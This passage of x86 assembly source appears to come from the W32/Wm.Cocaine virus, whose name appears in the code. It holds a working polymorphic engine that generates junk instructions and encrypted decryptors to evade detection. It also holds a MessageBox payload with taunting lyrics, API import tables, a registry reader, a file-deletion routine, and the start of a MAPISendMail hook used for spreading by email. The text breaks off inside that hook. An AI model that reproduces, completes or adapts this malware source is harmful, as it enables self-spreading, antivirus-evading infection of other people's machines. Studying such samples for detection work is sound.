|
bt [ebp+(ofs reg32-ofs vcode)], eax ;al,cl,dl,bl
|
|||
|
jc get8free
|
|||
|
call random_f
|
|||
|
jc @@2
|
|||
|
or al, 0100b ;ah,ch,dh,bh
|
|||
|
@@2:
|
|||
|
ret
|
|||
|
get8free endp
|
|||
|
|
|||
|
get32reg proc ;get a free 32bit reg
|
|||
|
call gar ;and mark it as used
|
|||
|
bts [ebp+(ofs reg32-ofs vcode)], eax
|
|||
|
jc get32reg
|
|||
|
ret
|
|||
|
get32reg endp
|
|||
|
|
|||
|
get32free proc ;get a free 32bit reg
|
|||
|
call gar ;and NOT mark it as used
|
|||
|
bt [ebp+(ofs reg32-ofs vcode)], eax
|
|||
|
jc get32free
|
|||
|
ret
|
|||
|
get32free endp
|
|||
|
|
|||
|
swapper proc
|
|||
|
call random0
|
|||
|
jc @@1
|
|||
|
xchg edx, ebx ;change order
|
|||
|
@@1:
|
|||
|
push edx
|
|||
|
call ebx ;call 1th
|
|||
|
call garble
|
|||
|
pop edx
|
|||
|
call edx ;call 2th
|
|||
|
call garble
|
|||
|
ret
|
|||
|
swapper endp
|
|||
|
|
|||
|
make_counter proc
|
|||
|
call get32reg
|
|||
|
mov [ebp+(ofs c_reg-ofs vcode)], eax
|
|||
|
cmp al, 5 ;ebp complicate methodz
|
|||
|
jne @@2
|
|||
|
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
|
|||
|
jmp make_counter
|
|||
|
@@2:
|
|||
|
or al, 0b8h
|
|||
|
stosb
|
|||
|
mov eax, [ebp+(ofs _size-ofs vcode)]
|
|||
|
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
|
|||
|
jnz @@1
|
|||
|
neg eax ;counter will be INCed
|
|||
|
@@1:
|
|||
|
stosd
|
|||
|
ret
|
|||
|
make_counter endp
|
|||
|
|
|||
|
make_pointer proc
|
|||
|
call get32reg
|
|||
|
cmp al, 5 ;ebp complicate methodz
|
|||
|
jne @@1
|
|||
|
btr [ebp+(ofs reg32-ofs vcode)], eax ;free ebp
|
|||
|
jmp make_pointer
|
|||
|
@@1:
|
|||
|
mov [ebp+(ofs p_reg-ofs vcode)], eax
|
|||
|
or al, 0b8h
|
|||
|
stosb
|
|||
|
mov eax, [ebp+(ofs rva-ofs vcode)]
|
|||
|
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
|
|||
|
jz @@2
|
|||
|
add eax, dwo [ebp+(ofs _size-ofs vcode)];pointer will be DECced
|
|||
|
dec eax
|
|||
|
@@2:
|
|||
|
stosd
|
|||
|
ret
|
|||
|
make_pointer endp
|
|||
|
|
|||
|
upd_pointer:
|
|||
|
mov eax, [ebp+(ofs p_reg-ofs vcode)]
|
|||
|
test dwo [ebp+(ofs flagz-ofs vcode)], mask _direction
|
|||
|
jmp _update_reg
|
|||
|
|
|||
|
upd_counter:
|
|||
|
mov eax, [ebp+(ofs c_reg-ofs vcode)]
|
|||
|
test dwo [ebp+(ofs flagz-ofs vcode)], mask _bwd_fwd
|
|||
|
|
|||
|
_update_reg proc ;z=inc/nz=dec
|
|||
|
mov ebx, 0140h ;inc
|
|||
|
mov edx, 0c083h ;add
|
|||
|
jz @@0
|
|||
|
xor edx, 0c083h xor 0e883h ;sub
|
|||
|
mov bl, 48h ;dec
|
|||
|
@@0:
|
|||
|
push eax
|
|||
|
mov eax, 3
|
|||
|
call random
|
|||
|
or eax, eax
|
|||
|
jz @@2 ;choose method
|
|||
|
dec eax
|
|||
|
jz @@1
|
|||
|
xor edx, 0c083h xor 0e883h ;sub<->add
|
|||
|
neg bh ;neg(1)
|
|||
|
@@1:
|
|||
|
pop ecx
|
|||
|
mov eax, edx
|
|||
|
or ah, cl ;patch reg
|
|||
|
stosw
|
|||
|
movzx eax, bh ;signal
|
|||
|
jmp @@3
|
|||
|
@@2:
|
|||
|
pop ecx
|
|||
|
xchg eax, ebx
|
|||
|
or al, cl ;patch reg
|
|||
|
@@3:
|
|||
|
stosb
|
|||
|
ret
|
|||
|
_update_reg endp
|
|||
|
|
|||
|
garble proc
|
|||
|
pushad
|
|||
|
inc by [ebp+(ofs recurse-ofs vcode)]
|
|||
|
cmp by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION
|
|||
|
jae @@1
|
|||
|
mov eax, 8
|
|||
|
call random
|
|||
|
add eax, 4
|
|||
|
mov ecx, eax ;4-11 instructionz
|
|||
|
@@0:
|
|||
|
push ecx
|
|||
|
lea esi, [ebp+(ofs gtable-ofs vcode)]
|
|||
|
mov eax, (ofs egtable - ofs gtable)/4
|
|||
|
call random
|
|||
|
shl eax, 2
|
|||
|
add esi, eax
|
|||
|
lodsd
|
|||
|
add eax, ebp
|
|||
|
cmp by [ebp+(ofs lgarble-ofs vcode)], al
|
|||
|
je @@2 ;same?
|
|||
|
mov by [ebp+(ofs lgarble-ofs vcode)], al
|
|||
|
call eax
|
|||
|
@@2:
|
|||
|
pop ecx
|
|||
|
loop @@0
|
|||
|
@@1:
|
|||
|
dec by [ebp+(ofs recurse-ofs vcode)]
|
|||
|
mov [esp], edi ;copy of edi in stack
|
|||
|
popad
|
|||
|
ret
|
|||
|
garble endp
|
|||
|
|
|||
|
make_subs proc
|
|||
|
cmp by [ebp+(ofs s_into-ofs vcode)], 0
|
|||
|
jne @@1
|
|||
|
cmp dwo [ebp+(ofs subs_index-ofs vcode)], MAX_SUBROUTINES
|
|||
|
ja @@1
|
|||
|
inc by [ebp+(ofs s_into-ofs vcode)] ;mark into
|
|||
|
mov eax, [ebp+(ofs subs_index-ofs vcode)]
|
|||
|
inc dwo [ebp+(ofs subs_index-ofs vcode)]
|
|||
|
mov ecx, 6
|
|||
|
cdq
|
|||
|
mul ecx
|
|||
|
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
|
|||
|
mov al, 0e9h
|
|||
|
stosb
|
|||
|
stosd
|
|||
|
push edi ;[esp]-4 = skip_jmp
|
|||
|
call garble
|
|||
|
mov [esi], edi ;where sub is
|
|||
|
mov eax, 5
|
|||
|
call random ;number of paramz pushed
|
|||
|
mov [esi.4], al ;by caller
|
|||
|
mov eax, 5
|
|||
|
call random ;number of local variables
|
|||
|
mov [esi.5], al
|
|||
|
test eax, eax ;if not local variables, then
|
|||
|
jz @@0 ;dont alloc stack
|
|||
|
mov ebx, eax
|
|||
|
shl ebx, 2 ;displacement in dwords
|
|||
|
mov al, 0c8h
|
|||
|
stosb ;enter
|
|||
|
mov eax, ebx
|
|||
|
stosd ;size/deep
|
|||
|
dec edi
|
|||
|
jmp @@2
|
|||
|
@@0:
|
|||
|
mov al, 55h
|
|||
|
stosb ;push ebp
|
|||
|
mov ax, 0ec8bh
|
|||
|
stosw ;mov ebp, esp
|
|||
|
@@2:
|
|||
|
push dwo [ebp+(ofs reg32-ofs vcode)] ;save reg state
|
|||
|
mov by [ebp+(ofs _pusha-ofs vcode)], 0 ;no use pusha at start
|
|||
|
mov eax, 3
|
|||
|
call random
|
|||
|
test eax, eax
|
|||
|
je @@4 ;will use PUSHA!
|
|||
|
@@10:
|
|||
|
call random0 ;choose regs
|
|||
|
and eax, 11111111b
|
|||
|
or eax, 00110000b ;set EBP and ESP too
|
|||
|
cmp al, -1
|
|||
|
jz @@10
|
|||
|
mov [ebp+(ofs reg32-ofs vcode)], eax
|
|||
|
and eax, 11001111b
|
|||
|
not al ;free regs are set bits now!
|
|||
|
test eax, eax
|
|||
|
jz @@10
|
|||
|
@@5:
|
|||
|
bsf edx, eax
|
|||
|
jz @@6 ;no more regs free?
|
|||
|
btc eax, edx ;clear it
|
|||
|
cmp dl, 4
|
|||
|
je @@5
|
|||
|
cmp dl, 5 ;ebp-esp dont need be saved
|
|||
|
je @@5
|
|||
|
push eax
|
|||
|
mov eax, edx ;get position
|
|||
|
or al, 50h
|
|||
|
stosb ;store as PUSH
|
|||
|
pop eax
|
|||
|
jmp @@5
|
|||
|
@@4:
|
|||
|
mov by [ebp+(ofs _pusha-ofs vcode)], -1 ;pusha used!
|
|||
|
mov dwo [ebp+(ofs reg32-ofs vcode)], 00110000b
|
|||
|
mov al, 60h ;set EBP and ESP as used
|
|||
|
stosb ;pusha
|
|||
|
@@6:
|
|||
|
movzx eax, by [esi.4]
|
|||
|
mov [ebp+(ofs lparm-ofs vcode)], eax
|
|||
|
movzx eax, by [esi.5]
|
|||
|
mov [ebp+(ofs lvars-ofs vcode)], eax ;set paramz to mem write/read
|
|||
|
call garble
|
|||
|
call garble
|
|||
|
call garble
|
|||
|
xor eax, eax
|
|||
|
mov [ebp+(ofs lparm-ofs vcode)], eax ;disable mem write/read
|
|||
|
mov [ebp+(ofs lvars-ofs vcode)], eax
|
|||
|
mov al, [ebp+(ofs _pusha-ofs vcode)]
|
|||
|
inc al
|
|||
|
jnz @@7 ;well, do individual POPs
|
|||
|
mov al, 61h
|
|||
|
stosb ;POPA
|
|||
|
jmp @@8
|
|||
|
@@7:
|
|||
|
mov eax, [ebp+(ofs reg32-ofs vcode)]
|
|||
|
and eax, 11001111b
|
|||
|
not al ;free regs are set bits now!
|
|||
|
@@9:
|
|||
|
bsr edx, eax
|
|||
|
jz @@8 ;no more regs free?
|
|||
|
btc eax, edx ;clear it
|
|||
|
cmp dl, 4
|
|||
|
je @@9
|
|||
|
cmp dl, 5 ;ebp-esp dont need be restored
|
|||
|
je @@9
|
|||
|
push eax
|
|||
|
mov eax, edx ;get position
|
|||
|
or al, 58h
|
|||
|
stosb ;store as POP this time
|
|||
|
pop eax
|
|||
|
jmp @@9
|
|||
|
@@8:
|
|||
|
pop dwo [ebp+(ofs reg32-ofs vcode)] ;restore reg state
|
|||
|
@@3:
|
|||
|
mov al, 0c9h
|
|||
|
stosb ;leave
|
|||
|
mov al, 0c2h
|
|||
|
stosb ;ret
|
|||
|
movzx eax, by [esi.4]
|
|||
|
shl eax, 2
|
|||
|
test eax, eax
|
|||
|
jz @@a
|
|||
|
stosw ;clean params
|
|||
|
jmp @@b
|
|||
|
@@a:
|
|||
|
mov by [edi-1], 0c3h ;no paramz, use RETN
|
|||
|
@@b:
|
|||
|
call garble
|
|||
|
pop esi
|
|||
|
mov ecx, edi
|
|||
|
sub ecx, esi ;distance
|
|||
|
mov [esi-4], ecx ;patch jmp
|
|||
|
dec by [ebp+(ofs s_into-ofs vcode)]
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
make_subs endp
|
|||
|
|
|||
|
make_call proc
|
|||
|
cmp by [ebp+(ofs s_into-ofs vcode)], 0
|
|||
|
jne @@1 ;cant call while creating sub
|
|||
|
mov eax, [ebp+(ofs subs_index-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@1
|
|||
|
call random ;choose one of the subs ready
|
|||
|
mov ecx, 6
|
|||
|
cdq
|
|||
|
mul ecx
|
|||
|
lea esi, [ebp+eax+(ofs subs_table-ofs vcode)]
|
|||
|
movzx ecx, by [esi.4]
|
|||
|
jecxz @@2 ;how much paramz it need?
|
|||
|
@@3:
|
|||
|
call gar
|
|||
|
or al, 50h ;push paramz
|
|||
|
stosb
|
|||
|
loop @@3
|
|||
|
@@2:
|
|||
|
mov al, 0e8h
|
|||
|
stosb ;build call
|
|||
|
mov eax, dwo [esi]
|
|||
|
sub eax, edi
|
|||
|
sub eax,4
|
|||
|
stosd ;store displacement
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
make_call endp
|
|||
|
|
|||
|
lea_dword proc
|
|||
|
mov al, 8dh
|
|||
|
stosb
|
|||
|
call get32free
|
|||
|
shl eax, 3
|
|||
|
push eax
|
|||
|
call gar
|
|||
|
pop edx
|
|||
|
or eax, edx
|
|||
|
or al, 80h
|
|||
|
stosb
|
|||
|
call random0
|
|||
|
stosd
|
|||
|
ret
|
|||
|
lea_dword endp
|
|||
|
|
|||
|
math_byte proc
|
|||
|
mov eax, 8
|
|||
|
call random
|
|||
|
shl eax, 3
|
|||
|
or eax, 1000000011000000b ;make math operation
|
|||
|
push eax
|
|||
|
call get8free
|
|||
|
pop edx
|
|||
|
jc @@1
|
|||
|
or eax, edx
|
|||
|
xchg al, ah
|
|||
|
stosw
|
|||
|
call random0
|
|||
|
stosb ;byte
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
math_byte endp
|
|||
|
|
|||
|
math_word proc
|
|||
|
mov ax, 8166h
|
|||
|
stosw
|
|||
|
call _math_imm
|
|||
|
stosw
|
|||
|
ret
|
|||
|
math_word endp
|
|||
|
|
|||
|
math_dword proc
|
|||
|
mov al, 81h
|
|||
|
stosb
|
|||
|
call _math_imm
|
|||
|
stosd
|
|||
|
ret
|
|||
|
math_dword endp
|
|||
|
|
|||
|
_math_imm proc
|
|||
|
mov eax, 8
|
|||
|
call random
|
|||
|
shl eax, 3
|
|||
|
or al, 11000000b
|
|||
|
push eax
|
|||
|
call get32free
|
|||
|
pop edx
|
|||
|
or eax, edx ;patch reg into
|
|||
|
stosb
|
|||
|
call random0
|
|||
|
ret
|
|||
|
_math_imm endp
|
|||
|
|
|||
|
push_pop proc
|
|||
|
call gar
|
|||
|
or al, 50h
|
|||
|
stosb
|
|||
|
call garble ;recurse into
|
|||
|
call get32free
|
|||
|
or al, 58h
|
|||
|
stosb
|
|||
|
ret
|
|||
|
push_pop endp
|
|||
|
|
|||
|
jmpcn proc
|
|||
|
mov eax, 0fh
|
|||
|
call random
|
|||
|
or ax, 0f80h ;jcc near
|
|||
|
xchg al, ah
|
|||
|
stosw
|
|||
|
stosd
|
|||
|
push edi
|
|||
|
call garble ;recurse
|
|||
|
pop esi
|
|||
|
mov eax, edi
|
|||
|
sub eax, esi
|
|||
|
mov dwo [esi-4], eax ;fix jcc
|
|||
|
ret
|
|||
|
jmpcn endp
|
|||
|
|
|||
|
jmpcs proc
|
|||
|
mov eax, 0fh
|
|||
|
call random
|
|||
|
or al, 70h ;make jmp conditional
|
|||
|
stosw
|
|||
|
push edi
|
|||
|
call garble ;recurse
|
|||
|
pop esi
|
|||
|
push edi
|
|||
|
mov eax, esi
|
|||
|
xchg eax, edi
|
|||
|
sub eax, edi
|
|||
|
mov by [esi-1], al ;fix jcc
|
|||
|
or al, al
|
|||
|
jns @@1 ;jmp destiny too far?
|
|||
|
mov edi, esi
|
|||
|
dec edi
|
|||
|
dec edi
|
|||
|
call one_byte ;replace with 2 byte instr
|
|||
|
call one_byte
|
|||
|
@@1:
|
|||
|
pop edi
|
|||
|
ret
|
|||
|
jmpcs endp
|
|||
|
|
|||
|
jmpn proc
|
|||
|
mov al, 0e9h
|
|||
|
stosb
|
|||
|
mov eax, JMP_MAX
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
mov ecx, eax
|
|||
|
stosd
|
|||
|
jmp _shit
|
|||
|
jmpn endp
|
|||
|
|
|||
|
jmps proc
|
|||
|
mov eax, JMP_MAX
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
mov ecx, eax
|
|||
|
mov ah, 0ebh
|
|||
|
xchg al, ah
|
|||
|
stosw
|
|||
|
movzx eax, ah
|
|||
|
_shit:
|
|||
|
call random0 ;ecx bytes of shit
|
|||
|
stosb
|
|||
|
loop _shit
|
|||
|
ret
|
|||
|
jmps endp
|
|||
|
|
|||
|
movr_byte proc
|
|||
|
call gar
|
|||
|
push eax
|
|||
|
call get8free
|
|||
|
jnc @@1
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
@@1:
|
|||
|
push eax
|
|||
|
mov al, 08ah
|
|||
|
jmp _reg_reg
|
|||
|
movr_byte endp
|
|||
|
|
|||
|
movr_word proc
|
|||
|
mov al, 66h ;word-size prefix
|
|||
|
stosb
|
|||
|
movr_word endp
|
|||
|
|
|||
|
movr_dword proc
|
|||
|
call gar
|
|||
|
push eax
|
|||
|
call get32free
|
|||
|
push eax
|
|||
|
mov al, 08bh
|
|||
|
_reg_reg:
|
|||
|
stosb
|
|||
|
pop eax ;destino
|
|||
|
pop edx ;source
|
|||
|
shl eax, 3
|
|||
|
or eax, edx
|
|||
|
or eax, 11000000b
|
|||
|
stosb
|
|||
|
ret
|
|||
|
movr_dword endp
|
|||
|
|
|||
|
mov_dword proc
|
|||
|
call get32free
|
|||
|
or al, 0b8h
|
|||
|
stosb
|
|||
|
call random0
|
|||
|
stosd
|
|||
|
ret
|
|||
|
mov_dword endp
|
|||
|
|
|||
|
mov_word proc
|
|||
|
mov al, 66h
|
|||
|
stosb
|
|||
|
call get32free
|
|||
|
or al, 0b8h
|
|||
|
stosb
|
|||
|
call random0
|
|||
|
stosw
|
|||
|
ret
|
|||
|
mov_word endp
|
|||
|
|
|||
|
mov_byte proc
|
|||
|
call get8free
|
|||
|
jc @@1
|
|||
|
or al, 0b0h
|
|||
|
stosb
|
|||
|
call random0
|
|||
|
stosb
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
mov_byte endp
|
|||
|
|
|||
|
one_byte proc
|
|||
|
mov eax, 5
|
|||
|
call random
|
|||
|
lea ebx, [ebp+(ofs one_byte_table-ofs vcode)]
|
|||
|
xlat
|
|||
|
stosb
|
|||
|
ret
|
|||
|
one_byte endp
|
|||
|
|
|||
|
inc_dec proc
|
|||
|
call get32free
|
|||
|
add al, 40h
|
|||
|
call random_f
|
|||
|
js @@1
|
|||
|
or al, 01000b ;inc/dec
|
|||
|
@@1:
|
|||
|
stosb
|
|||
|
ret
|
|||
|
inc_dec endp
|
|||
|
|
|||
|
mov_zs_x proc
|
|||
|
call random0
|
|||
|
mov eax, 0b60fh
|
|||
|
js @@1
|
|||
|
mov ah, 0beh ;z/s
|
|||
|
@@1:
|
|||
|
adc ah, 0 ;16/8
|
|||
|
stosw
|
|||
|
call gar
|
|||
|
push eax
|
|||
|
call get32free
|
|||
|
shl eax, 3
|
|||
|
pop edx
|
|||
|
or eax, edx
|
|||
|
or al, 0c0h
|
|||
|
stosb
|
|||
|
ret
|
|||
|
mov_zs_x endp
|
|||
|
|
|||
|
one_byte_table equ this byte
|
|||
|
std
|
|||
|
clc
|
|||
|
cmc
|
|||
|
cld
|
|||
|
std
|
|||
|
|
|||
|
crypt_table equ this byte
|
|||
|
db 080h, 030h, 034h ;xor
|
|||
|
db 0f6h, 010h, 0f6h ;not
|
|||
|
db 080h, 000h, 02ch ;add
|
|||
|
db 080h, 028h, 004h ;sub
|
|||
|
|
|||
|
gtable equ this byte
|
|||
|
dd ofs jmpcn-ofs vcode
|
|||
|
dd ofs jmpcs-ofs vcode
|
|||
|
dd ofs jmpn-ofs vcode
|
|||
|
dd ofs jmps-ofs vcode
|
|||
|
dd ofs one_byte-ofs vcode
|
|||
|
dd ofs push_pop-ofs vcode
|
|||
|
dd ofs push_pop-ofs vcode
|
|||
|
dd ofs push_pop-ofs vcode
|
|||
|
dd ofs push_pop-ofs vcode
|
|||
|
dd ofs inc_dec-ofs vcode
|
|||
|
dd ofs inc_dec-ofs vcode
|
|||
|
dd ofs mov_zs_x-ofs vcode
|
|||
|
dd ofs mov_zs_x-ofs vcode
|
|||
|
dd ofs math_word-ofs vcode
|
|||
|
dd ofs math_word-ofs vcode
|
|||
|
dd ofs movr_word-ofs vcode
|
|||
|
dd ofs movr_word-ofs vcode
|
|||
|
dd ofs mov_word-ofs vcode
|
|||
|
dd ofs mov_word-ofs vcode
|
|||
|
dd ofs movr_byte-ofs vcode
|
|||
|
dd ofs movr_byte-ofs vcode
|
|||
|
dd ofs movr_byte-ofs vcode
|
|||
|
dd ofs math_byte-ofs vcode
|
|||
|
dd ofs math_byte-ofs vcode
|
|||
|
dd ofs math_byte-ofs vcode
|
|||
|
dd ofs mov_byte-ofs vcode
|
|||
|
dd ofs mov_byte-ofs vcode
|
|||
|
dd ofs mov_byte-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs math_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs mov_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs movr_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
dd ofs lea_dword-ofs vcode
|
|||
|
|
|||
|
egtable equ this byte ;end of in-memory encripted part
|
|||
|
|
|||
|
title1 db 'W32/Wm.Cocaine', 0
|
|||
|
|
|||
|
text0 db 'Your life burn faster, obey your master...', 0
|
|||
|
text1 db 'Chop your breakfast on a mirror...', 0
|
|||
|
text2 db 'Veins that pump with fear, sucking darkest clear...', 0
|
|||
|
text3 db 'Taste me you will see, more is all you need...', 0
|
|||
|
text4 db 'I will occupy, I will help you die...', 0
|
|||
|
text5 db 'I will run through you, now I rule you too...', 0
|
|||
|
text6 db "Master of Puppets, I'm pulling your strings...", 0
|
|||
|
|
|||
|
text_table equ this byte
|
|||
|
dd ofs text0-ofs vcode
|
|||
|
dd ofs text1-ofs vcode
|
|||
|
dd ofs text2-ofs vcode
|
|||
|
dd ofs text3-ofs vcode
|
|||
|
dd ofs text4-ofs vcode
|
|||
|
dd ofs text5-ofs vcode
|
|||
|
dd ofs text6-ofs vcode
|
|||
|
|
|||
|
Payload:
|
|||
|
nop ;on/off switch
|
|||
|
sub ecx, ecx
|
|||
|
push ecx
|
|||
|
lea eax, [ebp+(ofs title1-ofs vcode)]
|
|||
|
push eax
|
|||
|
mov eax, 7
|
|||
|
call random
|
|||
|
mov eax, [ebp+(ofs text_table-ofs vcode)+eax*4]
|
|||
|
add eax, ebp
|
|||
|
push eax ;silly MessageBox payload
|
|||
|
push ecx
|
|||
|
call [ebp+(ofs _MessageBoxA-ofs vcode)]
|
|||
|
ret
|
|||
|
|
|||
|
kernel db 'KERNEL32', 0
|
|||
|
user db 'USER32', 0
|
|||
|
mapi db 'MAPI32', 0
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
sGetProcAddress db 'GetProcAddress', 0 ;APIs from kernel32.dll that
|
|||
|
sGetModuleHandle db 'GetModuleHandleA', 0 ;we need
|
|||
|
sCreateProcessA db 'CreateProcessA', 0
|
|||
|
sCreateFileA db 'CreateFileA', 0
|
|||
|
sWinExec db 'WinExec', 0
|
|||
|
sCloseHandle db 'CloseHandle', 0 ;api names, related to other 2
|
|||
|
sLoadLibraryA db 'LoadLibraryA', 0
|
|||
|
sFreeLibrary db 'FreeLibrary', 0
|
|||
|
sCreateFileMappingA db 'CreateFileMappingA', 0
|
|||
|
sMapViewOfFile db 'MapViewOfFile', 0
|
|||
|
sUnmapViewOfFile db 'UnmapViewOfFile', 0
|
|||
|
sFindFirstFileA db 'FindFirstFileA', 0
|
|||
|
sFindNextFileA db 'FindNextFileA', 0
|
|||
|
sFindClose db 'FindClose', 0
|
|||
|
sSetEndOfFile db 'SetEndOfFile', 0
|
|||
|
sVirtualAlloc db 'VirtualAlloc', 0
|
|||
|
sVirtualFree db 'VirtualFree', 0
|
|||
|
sGetSystemTime db 'GetSystemTime', 0
|
|||
|
sGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0
|
|||
|
sGetSystemDirectoryA db 'GetSystemDirectoryA', 0
|
|||
|
sGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0
|
|||
|
sSetFileAttributesA db 'SetFileAttributesA', 0
|
|||
|
sSetFileTime db 'SetFileTime', 0
|
|||
|
sExitProcess db 'ExitProcess', 0
|
|||
|
sGetCurrentProcess db 'GetCurrentProcess', 0
|
|||
|
sWriteProcessMemory db 'WriteProcessMemory',0
|
|||
|
sWriteFile db 'WriteFile', 0
|
|||
|
sDeleteFileA db 'DeleteFileA', 0
|
|||
|
sSleep db 'Sleep', 0
|
|||
|
sCreateThread db 'CreateThread', 0
|
|||
|
sGetFileSize db 'GetFileSize', 0
|
|||
|
sSetFilePointer db 'SetFilePointer', 0
|
|||
|
|
|||
|
sMessageBoxA db 'MessageBoxA', 0 ;USER32 functionz
|
|||
|
sFindWindowA db 'FindWindowA', 0
|
|||
|
sPostMessageA db 'PostMessageA', 0
|
|||
|
|
|||
|
sMAPISendMail db 'MAPISendMail', 0
|
|||
|
|
|||
|
ConsultKey proc
|
|||
|
call @@1
|
|||
|
@@1v dd 0
|
|||
|
@@1:
|
|||
|
push 000F003Fh ;KEY_ALL_ACCESS
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
|
|||
|
push 80000001H
|
|||
|
what_key equ dwo $-4
|
|||
|
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jnz @@0
|
|||
|
call @@3
|
|||
|
dd 0
|
|||
|
@@3:
|
|||
|
mov edx, [esp]
|
|||
|
mov dwo [edx], MAX_PATH
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
mov esi, eax
|
|||
|
mov [eax], eax
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
call @@4
|
|||
|
db 0
|
|||
|
@@4:
|
|||
|
push dwo [ebp+(ofs @@1v-ofs vcode)]
|
|||
|
call [ebp+(ofs _RegQueryValueEx-ofs vcode)]
|
|||
|
push dwo [ebp+(ofs @@1v-ofs vcode)]
|
|||
|
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
|
|||
|
@@0:
|
|||
|
ret
|
|||
|
ConsultKey endp
|
|||
|
|
|||
|
align 4
|
|||
|
|
|||
|
k32_names equ this byte
|
|||
|
dd (ofs sCreateProcessA-ofs vcode)
|
|||
|
dd (ofs sCreateFileA-ofs vcode);these are relative pointerz
|
|||
|
dd (ofs sWinExec-ofs vcode) ;to namez... zero end list
|
|||
|
dd (ofs sCloseHandle-ofs vcode)
|
|||
|
dd (ofs sLoadLibraryA-ofs vcode)
|
|||
|
dd (ofs sFreeLibrary-ofs vcode)
|
|||
|
dd (ofs sCreateFileMappingA-ofs vcode)
|
|||
|
dd (ofs sMapViewOfFile-ofs vcode)
|
|||
|
dd (ofs sUnmapViewOfFile-ofs vcode)
|
|||
|
dd (ofs sFindFirstFileA-ofs vcode)
|
|||
|
dd (ofs sFindNextFileA-ofs vcode)
|
|||
|
dd (ofs sFindClose-ofs vcode)
|
|||
|
dd (ofs sSetEndOfFile-ofs vcode)
|
|||
|
dd (ofs sVirtualAlloc-ofs vcode)
|
|||
|
dd (ofs sVirtualFree-ofs vcode)
|
|||
|
dd (ofs sGetSystemTime-ofs vcode)
|
|||
|
dd (ofs sGetWindowsDirectoryA-ofs vcode)
|
|||
|
dd (ofs sGetSystemDirectoryA-ofs vcode)
|
|||
|
dd (ofs sGetCurrentDirectoryA-ofs vcode)
|
|||
|
dd (ofs sSetFileAttributesA-ofs vcode)
|
|||
|
dd (ofs sSetFileTime-ofs vcode)
|
|||
|
dd (ofs sExitProcess-ofs vcode)
|
|||
|
dd (ofs sGetCurrentProcess-ofs vcode)
|
|||
|
dd (ofs sWriteProcessMemory-ofs vcode)
|
|||
|
dd (ofs sWriteFile-ofs vcode)
|
|||
|
dd (ofs sDeleteFileA-ofs vcode)
|
|||
|
dd (ofs sSleep-ofs vcode)
|
|||
|
dd (ofs sCreateThread-ofs vcode)
|
|||
|
dd (ofs sGetFileSize-ofs vcode)
|
|||
|
dd (ofs sSetFilePointer-ofs vcode)
|
|||
|
dd 0
|
|||
|
dd (ofs sMessageBoxA-ofs vcode)
|
|||
|
dd (ofs sFindWindowA-ofs vcode)
|
|||
|
dd (ofs sPostMessageA-ofs vcode)
|
|||
|
dd 0
|
|||
|
|
|||
|
DeleteShitFile proc
|
|||
|
call delta
|
|||
|
mov ebx, [esp+4]
|
|||
|
push 80h
|
|||
|
push ebx
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@1
|
|||
|
push ebx
|
|||
|
call [ebp+(ofs _DeleteFileA-ofs vcode)]
|
|||
|
@@1:
|
|||
|
ret 4
|
|||
|
DeleteShitFile endp
|
|||
|
|
|||
|
NewMAPISendMail proc
|
|||
|
push esp ;original MAPISendMail
|
|||
|
pushad
|
|||
|
call delta
|
|||
|
lea eax, [ebp+(ofs mapi-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
|
|||
|
